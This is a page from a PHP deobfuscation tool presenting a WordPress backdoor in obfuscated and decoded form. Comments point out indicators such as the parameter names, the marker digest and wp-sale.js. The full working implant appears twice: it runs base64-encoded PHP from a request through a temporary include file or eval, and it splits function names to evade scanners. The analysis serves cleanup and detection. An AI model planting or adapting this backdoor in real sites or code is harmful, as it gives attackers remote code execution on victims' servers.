
PHP deobfuscation, decryption, reconstruction tool

Deobfuscates PHP malware, viruses and injected (tampering) code found on WordPress sites back into readable source code.

*Please note that not every obfuscation scheme can be decoded.

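The code below has been decoded. The sample is a backdoor: once one request parameter matches a hard-coded MD5 digest, it runs PHP code supplied base64-encoded in a second request parameter.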

<?php $bnlqr = array_merge($_GET, $_COOKIE, $_POST); $kfjbs = 'in_' . 'ar' . 'ray'; if ($bnlqr['m'] == '1') die('d3fa8bd72798457b3b865c6ee12c1e6c'); if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') agvtc($bnlqr); function agvtc($lozgt) { $thxir = 'fi' . 'le_' . 'exi' . 'sts'; $rqr...



Obfuscated PHP code

<?php
// Request entry point of the sample. GET, cookie and POST values are merged into one array,
// so each parameter read below is accepted from any of the three sources (for a repeated
// key array_merge keeps the last one, i.e. POST over cookie over GET).
$bnlqr = array_merge($_GET, $_COOKIE, $_POST);
	// The fragments concatenate to 'in_array'. Nothing in this listing reads the variable at
	// file scope; the function below assigns its own local of the same name.
	$kfjbs = 'in_' . 'ar' . 'ray';
	// Marker branch: a request carrying m=1 (loose ==) is answered with this fixed 32-hex
	// string and the script stops. Presumably a presence check for the implant; the string
	// in a response body is a usable indicator for this sample.
	if ($bnlqr['m'] == '1') die('d3fa8bd72798457b3b865c6ee12c1e6c');
	// Access gate: the payload runner is only reached when the unsalted MD5 of parameter
	// 'ad975' equals the hard-coded digest, which is the same string the m=1 branch prints.
	// Request logs or WAF rules can key on the parameter names 'm', 'ad975' and 'a287b'.
	if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') agvtc($bnlqr);
	/**
	 * Payload runner of the sample: executes PHP code taken from the request.
	 *
	 * file_exists, unlink, tmpfile, base64_decode, stream_get_meta_data and fclose are
	 * assembled from string fragments or chr() codes and called through variables, so those
	 * names never appear as literal tokens; fwrite, include and eval are written literally.
	 * Presumably the splitting is meant to defeat scanners that match function names.
	 *
	 * @param array $lozgt Merged request parameters; only the 'a287b' entry is read here.
	 */
	function agvtc($lozgt)
	{
		// 'file_exists'
		$thxir = 'fi' . 'le_' . 'exi' . 'sts';
		// 'fopen' (assigned but never called in this function)
		$rqrop = 'f' . 'op' . 'en';
		// 'fclose'
		$mhyau = 'f' . 'cl' . 'ose';
		// 'unlink'
		$iqwlb = 'u' . 'nl' . 'ink';
		// Deletes ./wp-sale.js from the current working directory when it exists, with the
		// error suppressed. What that file held is not visible from this sample; its name is
		// still worth searching for on an affected host.
		if ($thxir('./wp-sale.js')) {
			@$iqwlb('./wp-sale.js');
		}
		// 'tmpfile'
		$kzmne = 't' . 'mpf' . 'ile';
		// 'fwrite' and 'fseek' (both assigned but never called through these variables)
		$cfyeu = 'fw' . 'rite';
		$doyng = 'fs' . 'eek';
		// 'ba' . 'se' . "64_dec" . 'o' . "de" => 'base64_decode'
		$amsaj = 'ba' . 'se' . chr(54) . chr(52) . chr(95) . chr(100) . chr(101) . chr(99) . 'o' . chr(100) . chr(101);
		// 'stream_get_meta_data'
		$kfjbs = 'str' . 'ea' . 'm_' . 'get' . '_m' . 'eta' . '_' . 'data';
		// Opens an anonymous temporary file; PHP removes it when the handle is closed.
		$nemqs = $kzmne();
		// The chr() run spells "<?php ". The base64-decoded value of parameter 'a287b' is
		// appended to it, so the temporary file becomes a PHP script made of request data.
		if (fwrite($nemqs, chr(60) . chr(63) . chr(112) . chr(104) . chr(112) . chr(32) . $amsaj($lozgt['a287b'])) != false) {
			// Runs the temporary file through include, using the path reported in the
			// stream metadata, then closes the handle. The payload therefore exists on disk
			// only for the duration of the request, which limits what file scans can find.
			include($kfjbs($nemqs)['uri']);
			$mhyau($nemqs);
		} else {
			// Fallback when the write reports failure: the same decoded payload goes to
			// eval() with errors suppressed.
			@eval($amsaj($lozgt['a287b']));
		}
	}

Decoded (deobfuscated) PHP code

<?php

// Decoded form of the sample's request entry point. GET, cookie and POST values are merged,
// so the parameters below may arrive through any of the three (array_merge keeps the last
// value for a repeated key: POST over cookie over GET).
$bnlqr = array_merge($_GET, $_COOKIE, $_POST);
// Leftover of the obfuscation: assigned here, not read at file scope in this listing.
$kfjbs = 'in_array';
// Marker branch: m=1 (loose ==) returns the fixed string and ends the request. Presumably
// this lets the operator confirm the implant is present; defenders can match the string in
// response bodies.
if ($bnlqr['m'] == '1') {
    die('d3fa8bd72798457b3b865c6ee12c1e6c');
}
// Access gate: unsalted MD5 of parameter 'ad975' compared with a hard-coded digest (the
// same value printed above). Only a matching request reaches the payload runner.
if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') {
    agvtc($bnlqr);
}
/**
 * Payload runner of the decoded sample: executes PHP code supplied in the request.
 *
 * The deobfuscator resolved most variable-function calls to direct calls but kept the
 * original string assignments, so several locals below are dead leftovers.
 *
 * @param array $lozgt Merged request parameters; only the 'a287b' entry is read here.
 */
function agvtc($lozgt)
{
    // Leftover name holders; of these four only $mhyau ('fclose') is still called below.
    $thxir = 'file_exists';
    $rqrop = 'fopen';
    $mhyau = 'fclose';
    $iqwlb = 'unlink';
    // Removes ./wp-sale.js from the current working directory if present, suppressing any
    // error. The role of that file is not visible from this sample; the name is an
    // indicator to search for during cleanup.
    if (file_exists('./wp-sale.js')) {
        @unlink('./wp-sale.js');
    }
    // More leftover name holders; none of these five is read again in this listing.
    $kzmne = 'tmpfile';
    $cfyeu = 'fwrite';
    $doyng = 'fseek';
    $amsaj = "base64_decode";
    $kfjbs = 'stream_get_meta_data';
    // Anonymous temporary file; PHP deletes it when the handle is closed.
    $nemqs = tmpfile();
    // Writes "<?php " followed by the base64-decoded value of parameter 'a287b', turning the
    // temporary file into a PHP script whose content comes from the request.
    if (fwrite($nemqs, "<?php " . base64_decode($lozgt['a287b'])) != false) {
        // Executes the temporary file via include, taking its path from the stream
        // metadata. Nothing persists on disk after the request, so detection has to rely on
        // this loader file and on request logs rather than on a dropped payload.
        include stream_get_meta_data($nemqs)['uri'];
        // Still a variable-function call in the decoded output; $mhyau holds 'fclose'.
        $mhyau($nemqs);
    } else {
        // Fallback when the write reports failure: eval() of the same decoded payload with
        // errors suppressed.
        @eval(base64_decode($lozgt['a287b']));
    }
}

